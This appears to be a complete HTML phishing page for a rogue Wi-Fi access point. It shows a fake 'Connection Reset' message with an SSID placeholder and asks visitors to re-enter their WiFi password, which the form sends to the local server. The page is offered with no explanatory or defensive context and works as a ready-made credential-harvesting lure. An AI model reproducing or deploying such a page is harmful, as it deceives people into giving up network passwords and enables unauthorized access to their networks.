<html><head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body style='font: 13px/20px "Lucida Grande", Tahoma, Verdana, sans-serif;
  color: #404040;
  background: #0ca3d2;'>
<div class="login" style="position: relative;
  margin: 30px auto;
  padding: 20px 20px 20px;
  width: 310px;
  background: white;
  border-radius: 3px;
  -webkit-box-shadow: 0 0 200px rgba(255, 255, 255, 0.5), 0 1px 2px rgba(0, 0, 0, 0.3);
  box-shadow: 0 0 200px rgba(255, 255, 255, 0.5), 0 1px 2px rgba(0, 0, 0, 0.3);">
  <h1 style="margin: -20px -20px 21px;
  line-height: 40px;
  font-size: 15px;
  font-weight: bold;
  color: #555;
  text-align: center;
  text-shadow: 0 1px white;
  background: #f3f3f3;
  border-bottom: 1px solid #cfcfcf;
  border-radius: 3px 3px 0 0;
  background-image: -webkit-linear-gradient(top, whiteffd, #eef2f5);
  background-image: -moz-linear-gradient(top, whiteffd, #eef2f5);
  background-image: -o-linear-gradient(top, whiteffd, #eef2f5);
  background-image: linear-gradient(to bottom, whiteffd, #eef2f5);
  -webkit-box-shadow: 0 1px whitesmoke;
  box-shadow: 0 1px whitesmoke;">
  <span id="ssid">ssid </span>  Connection Reset <br> Please Re-Submit Your WiFi Password</h1>
  <form action='/' method='get'>
    
    <p style="margin: 20px 0 0;"><input type=password name=password value placeholder="Password" style="font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;font-size:14px;margin:5px;padding:0 10px;width:278px;height:34px;color:#404040;background:white;border:1px solid;border-color:#c4c4c4 #d1d1d1 #d4d4d4;border-radius:2px;outline:5px solid #eff4f7;-moz-outline-radius:3px;-webkit-box-shadow:inset 0 1px 3px rgba(0, 0, 0, 0.12);box-shadow:inset 0 1px 3px rgba(0, 0, 0, 0.12);"></p>
    <p class="remember_me" style="margin:20px 0 0;float:left;line-height:31px;">
      <label style="font-size: 12px;
  color: #777;
  cursor: pointer;">
        <input type="checkbox" style="font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;font-size:14px;position:relative;bottom:1px;margin-right:4px;vertical-align:middle;">
        Remember me on this computer
      </label>
    </p><input type="hidden" id="isURL" name="url" value="">
    <p class="submit" style="margin:20px 0 0;text-align:right;"><input type=submit name="commit" value="Connect" style="font-family:'Lucida Grande', Tahoma, Verdana, sans-serif;font-size:12px;padding:0 18px;height:29px;font-weight:bold;color:#527881;text-shadow:0 1px #e3f1f1;background:#cde5ef;border:1px solid;border-color:#b4ccce #b3c0c8 #9eb9c2;border-radius:16px;outline:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;background-image:linear-gradient(to bottom, #edf5f8, #cde5ef);-webkit-box-shadow:inset 0 1px white, 0 1px 2px rgba(0, 0, 0, 0.15);box-shadow:inset 0 1px white, 0 1px 2px rgba(0, 0, 0, 0.15);"></p>
  </form>
</div>
 
<div class="login-help" style="margin: 20px 0;
  font-size: 11px;
  color: white;
  text-align: center;
  text-shadow: 0 1px #2a85a1;">
  <p>Forgot your password? <a href="#" style="color: #cce7fa;
  text-decoration: none;">Click here to reset it</a>.</p>
</div>
</body><script src="/index.js"></script></html>